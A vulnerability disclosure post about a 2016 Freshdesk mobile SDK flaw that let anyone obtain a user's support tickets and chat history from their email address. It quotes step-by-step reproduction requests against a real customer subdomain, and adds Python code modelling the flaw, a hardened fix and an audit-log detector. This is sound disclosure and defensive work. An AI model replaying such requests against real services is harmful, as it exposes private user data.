Freshdesk Security Vulnerability

Fallible
2 min read · Jan 12, 2017


Freshdesk is a SaaS helpdesk and support product used by more than 100,000 companies worldwide. During a security review for one of our customers, we came across a vulnerability in Freshdesk that exposed chat history and user data for the end users of every Freshdesk customer that had integrated the Freshdesk mobihelp Mobile SDK. Freshdesk has promised to inform all affected customers and will be deprecating the current SDK. We reported the issue on 12 Dec 2016. A temporary fix was deployed the same day and a complete fix on 26 Dec 2016.

It should be noted that your users' data can leak through any of the third-party services you integrate, including customer support, analytics and others. Where possible, minimise the personally identifiable information you send to such systems to what is absolutely required. It should also be noted that Zendesk, a Freshdesk competitor, has disclosed a vulnerability of its own in the past.

Here is the mail that was sent to Freshdesk describing the technical details of the issue.

Hi XXXXX,

We have researched a security vulnerability in Freshdesk that exposes user data and chat history for any user, given their email address on all [sic] of Freshdesk customers. The Freshdesk mobile SDK has a design flaw that exposes read functionality on /mobihelp endpoint. We advise you to verify this issue, notify all your customers and do an internal assessment of all your customer data and audit logs to check if any of their data was compromised in the past. Please do let us know when you fix this issue. We would be informing XXXXXX-COMPANY and XXXXXX-COMPANY about this issue later today.

STEPS TO REPRODUCE:

1. Make a request to the given URL with a unique device uuid and the victim’s email address. You will get an API key.

URL: https://bookmyshow.freshdesk.com/mobihelp/devices/register_user?format=json&pt=ios&sv=v1.6.5

REQUEST BODY:

{
  "device_info": {
    "device_uuid": "51BCA4F4-4826-499D-93D2-F3A53C4630A2"
  },
  "user": {
    "external_id": "913934",
    "email": "victim@email.com",
    "name": "Victim"
  }
}

RESPONSE BODY:

{ "api_key": "Bo5PcxU45HiJCT26Rfdq" }

2. Encode the API key with base64 for further use

Base64encode(Bo5PcxU45HiJCT26Rfdq:x)

3. Use the Base64 encoded string in step 2 in the Basic Auth header and make a GET request to the following URL

URL: https://bookmyshow.freshdesk.com/support/mobihelp/tickets?format=json&pt=ios&sv=v1.6.5

Authorization: Basic Qm81UGN4VTQ1SGlKQ1QyNlJmZHE6eA==

4. The response will contain the ticket/chat history and possibly personal information somewhere in it.
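The root cause in the mail above is a registration endpoint that mints a credential for whatever email address the client claims, so the key it returns is as good as the victim's own. The following model is an added example, not Freshdesk's code or API: it contrasts that flawed flow with a hardened one in which a fresh device key starts out anonymous and is only linked to an email after the user proves control of the mailbox with a one-time code. All names (`Store`, `vulnerable_register`, `hardened_register`, the link functions, the sample ticket data) are assumptions made for the illustration.

```python
"""Model of a mobile-SDK registration flow: flawed versus hardened.

Added example (not Freshdesk's code). The store, endpoints and ticket data are
constructed for the illustration.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Store:
    tickets_by_email: dict = field(default_factory=dict)  # email -> list of ticket subjects
    keys: dict = field(default_factory=dict)              # api_key -> {"device": ..., "email": ... | None}
    pending: dict = field(default_factory=dict)           # api_key -> (email, sha256 of one-time code)


def vulnerable_register(store, device_uuid, email):
    """The flaw: the email is client-controlled and never verified, yet the
    key issued here is bound to it and therefore reads that user's tickets."""
    key = secrets.token_urlsafe(15)
    store.keys[key] = {"device": device_uuid, "email": email}
    return key


def tickets_for(store, api_key):
    """Ticket listing as the /tickets endpoint would do it: scoped to the
    identity bound to the key. An unlinked key sees nothing."""
    ident = store.keys.get(api_key)
    if ident is None or ident["email"] is None:
        return []
    return store.tickets_by_email.get(ident["email"], [])


def hardened_register(store, device_uuid):
    """Hardened: a device gets a key, but no email identity is attached yet."""
    key = secrets.token_urlsafe(15)
    store.keys[key] = {"device": device_uuid, "email": None}
    return key


def start_email_link(store, api_key, email, send_mail):
    """Send a one-time code to the claimed mailbox. Only its hash is stored and
    the code itself never goes back to the API caller."""
    code = f"{secrets.randbelow(10**6):06d}"
    store.pending[api_key] = (email, hashlib.sha256(code.encode()).hexdigest())
    send_mail(email, code)


def finish_email_link(store, api_key, code):
    """Bind the email to the key only if the caller presents the mailed code.
    A wrong guess consumes the pending entry, so each code allows one attempt."""
    entry = store.pending.pop(api_key, None)
    if entry is None:
        return False
    email, expected = entry
    got = hashlib.sha256(code.encode()).hexdigest()
    if not hmac.compare_digest(expected, got):
        return False
    store.keys[api_key]["email"] = email
    return True


def demo():
    """Stand-alone run. Returns (leak_with_flaw, leak_before_verification,
    access_after_verification), expected (True, False, True)."""
    victim = "victim@example.com"
    s = Store()
    s.tickets_by_email[victim] = ["Refund for order 42"]
    leaked = tickets_for(s, vulnerable_register(s, "dev-unverified", victim)) != []

    s2 = Store()
    s2.tickets_by_email[victim] = ["Refund for order 42"]
    key = hardened_register(s2, "dev-unverified")
    before = tickets_for(s2, key) != []
    mailbox = {}  # stands in for the victim's inbox; only its owner can read it
    start_email_link(s2, key, victim, lambda addr, c: mailbox.__setitem__(addr, c))
    finish_email_link(s2, key, mailbox[victim])
    after = tickets_for(s2, key) != []
    return leaked, before, after


if __name__ == "__main__":
    print(demo())
```

The design point is that the credential is bound to the device first and to an identity only after a proof the client cannot forge; a registration endpoint that skips that step is an authentication bypass regardless of how strong the API key itself is.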
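The mail also asks the vendor to audit its logs for past abuse. Because the flawed endpoint hands out a key for any claimed email, exploitation leaves a distinctive trace: one device UUID (or one client IP) registering many different email addresses in a short time. The script below is an added example of that retrospective check, not Freshdesk tooling; the audit-log format, the device UUIDs, the addresses and the timestamps are all constructed for the illustration.

```python
"""Retrospective audit-log check for credential-minting abuse of a
register_user style endpoint. Added example; log format and values constructed."""
import re
from collections import defaultdict
from datetime import datetime

REGISTER_PATH = "/mobihelp/devices/register_user"

# Constructed audit-log lines: timestamp, client IP, request path, device UUID, claimed email.
SAMPLE_LOG = """\
2016-12-11T10:00:01Z ip=203.0.113.7 path=/mobihelp/devices/register_user device_uuid=AAAA-0001 email=alice@example.org
2016-12-11T10:00:05Z ip=203.0.113.7 path=/mobihelp/devices/register_user device_uuid=AAAA-0001 email=bob@example.org
2016-12-11T10:00:09Z ip=203.0.113.7 path=/mobihelp/devices/register_user device_uuid=AAAA-0001 email=carol@example.org
2016-12-11T10:00:12Z ip=203.0.113.7 path=/mobihelp/devices/register_user device_uuid=AAAA-0001 email=dave@example.org
2016-12-11T10:03:00Z ip=198.51.100.2 path=/mobihelp/devices/register_user device_uuid=BBBB-0002 email=erin@example.org
2016-12-11T14:30:00Z ip=198.51.100.2 path=/mobihelp/devices/register_user device_uuid=BBBB-0002 email=erin2@example.org
2016-12-11T10:04:00Z ip=203.0.113.7 path=/support/mobihelp/tickets device_uuid=AAAA-0001 email=-
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) path=(?P<path>\S+) "
    r"device_uuid=(?P<dev>\S+) email=(?P<email>\S+)$"
)


def parse(log_text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        yield {
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "ip": m["ip"],
            "path": m["path"],
            "dev": m["dev"],
            "email": m["email"],
        }


def find_enumeration(log_text, threshold=3, window_s=600, group_by="dev"):
    """Return {group: sorted distinct emails} for every device UUID (or IP, with
    group_by="ip") that registered at least `threshold` distinct emails inside
    any `window_s`-second window. A legitimate device re-registering the same
    account, or a shared IP with a few users spread over hours, stays below the bar."""
    events = defaultdict(list)
    for ev in parse(log_text):
        if ev["path"] == REGISTER_PATH:
            events[ev[group_by]].append((ev["ts"], ev["email"]))

    flagged = {}
    for group, regs in events.items():
        regs.sort()
        start = 0
        for end in range(len(regs)):  # sliding window over time-ordered registrations
            while (regs[end][0] - regs[start][0]).total_seconds() > window_s:
                start += 1
            distinct = {email for _, email in regs[start:end + 1]}
            if len(distinct) >= threshold:
                flagged[group] = sorted({email for _, email in regs})
                break
    return flagged


if __name__ == "__main__":
    for group, emails in find_enumeration(SAMPLE_LOG).items():
        print(f"{group}: {len(emails)} distinct emails registered: {', '.join(emails)}")
```

Grouping by device UUID catches the naive pattern in step 1 of the mail (one UUID reused across victims); grouping by IP catches a client that rotates UUIDs per request. Run both, and treat a hit as a list of end users whose ticket history must be assumed read.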

